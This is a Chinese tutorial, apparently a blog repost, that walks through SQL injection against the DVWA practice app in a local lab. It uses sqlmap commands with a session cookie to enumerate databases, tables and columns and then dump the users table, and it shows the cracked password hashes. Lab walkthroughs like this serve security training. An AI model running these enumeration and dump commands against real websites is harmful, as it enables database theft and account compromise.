1、使用firefox浏览器(安装一个firebug插件)登录http://192.168.204.132/dvwa/login.php页面,使用admin/password

2、打开firebug工具的cookie面板,将所有cookie复制下来。得到:

PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2; path=/; domain=192.168.204.132
           security=low; path=/dvwa/; domain=192.168.204.132

3、打开dvwa的SQL Injection页面,在User ID输入框内输入1,点击submit按钮。从地址栏得到要测试的url:

http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

4、从kali打开终端,数据sqlmap,将会有提示文档。

5、开始测试该url是否存在sql注入漏洞,在终端输入:

sqlmap -u
'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' 
- -cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low'

得到信息结果:

web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.18
back-end DBMS: MySQL >= 5.5

6、开始探测MYSQL中用来存放应用数据的数据库名称,在终端输入:

sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' --dbs -v 0

得到信息结果:

available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

7、得到数据库是dvwa后,开始获取数据库中所存在表,在终端输入:

sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables

得到信息结果:

Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

8、得到两张表,获取一下users表的字段,在终端输入:

sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables -T users --columns

得到信息结果:

Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+

9、最后可以吧表数据导出来了,在终端输入:

sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables -T users --columns --dump

得到信息结果:

Table: users
[5 entries]
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar | user | password | last_name | first_name | last_login | failed_login |
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | http://127.0.0.1/DVWA/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2017-04-01 00:58:43 | 0 |
| 2 | http://127.0.0.1/DVWA/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2017-04-01 00:58:43 | 0 |
| 3 | http://127.0.0.1/DVWA/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2017-04-01 00:58:43 | 0 |
| 4 | http://127.0.0.1/DVWA/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2017-04-01 00:58:43 | 0 |
| 5 | http://127.0.0.1/DVWA/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2017-04-01 00:58:43 | 0 |
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.204.132/dump/dvwa/users.csv'

并且导出CSV数据到本地!还发现一个惊喜数,据库中的密文密码也给破译了!!

给出sqlmap的一些选项:(sqlmap -h会给出英文的帮助文档)
–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”
-u : 指定目标URL
-b : 获取DBMS banner
–current-db : 获取当前数据库
–current-user:获取当前用户

–string : 当查询可用时用来匹配页面中的字符串
–users : 枚举DBMS用户
–password : 枚举DBMS用户密码hash

–dbs: 枚举DBMS中的数据库

-D : 要枚举的DBMS数据库
–tables     : 枚举DBMS数据库中的数据表

–columns : 枚举DBMS数据库表中的所有列

-T : 要枚举的DBMS数据表

-C: 要枚举的DBMS数据表中的列

–dump : 转储DBMS数据表项

非常感谢原博主的分享,受益颇多:http://blog.csdn.net/qq_20745827/article/details/68953621

最新文章

  1. 解决Tomcat: Can't load IA 32-bit .dll on a AMD 64-bit platform问题
  2. 《Java程序设计》学期总结
  3. dns 服务器配置
  4. LUCAS 定理
  5. 使用Sunny-grok实现内网转发
  6. JVM基础和调优(四)
  7. 上拉、下拉UITableView,交互式 模态弹出(自定义弹出动画)
  8. BZOJ 网站镜像
  9. 14.2.4 InnoDB Undo Logs
  10. GO语言初探
  11. Android Studio开发环境配置以及相关说明
  12. C语言中使用bool
  13. CC2530微处理器接口开发技术——信号灯的设计与实现
  14. Chrome 屏蔽广告
  15. Libre 6011 「网络流 24 题」运输问题 (网络流,最小费用最大流)
  16. Starting with neural network in matlab[zz]
  17. Oracle HA 之 测试RAC的功能
  18. LogCat里的错误提示 FATAL EXCEPTION: main
  19. 【学习笔记】--- 老男孩学Python,day13 生成器,生成器函数,各种推倒式和生成器表达式
  20. pyqt5的代码

热门文章

  1. Redis入门到高可用(三)——通用命令
  2. Dell R730服务器 Raid0 Raid5配置
  3. 阿里云ECS利用密钥对ssh登录服务器
  4. 虚拟货币ICO是什么意思 看完秒懂
  5. ROC曲线,AUC面积
  6. 从零开始一起学习SLAM | 学习SLAM到底需要学什么?
  7. spring之文件上传
  8. shell基础:通配符和其他特殊符号
  9. 32.js 判断当前页面是否被浏览
  10. HDU 1757 A Simple Math Problem(矩阵)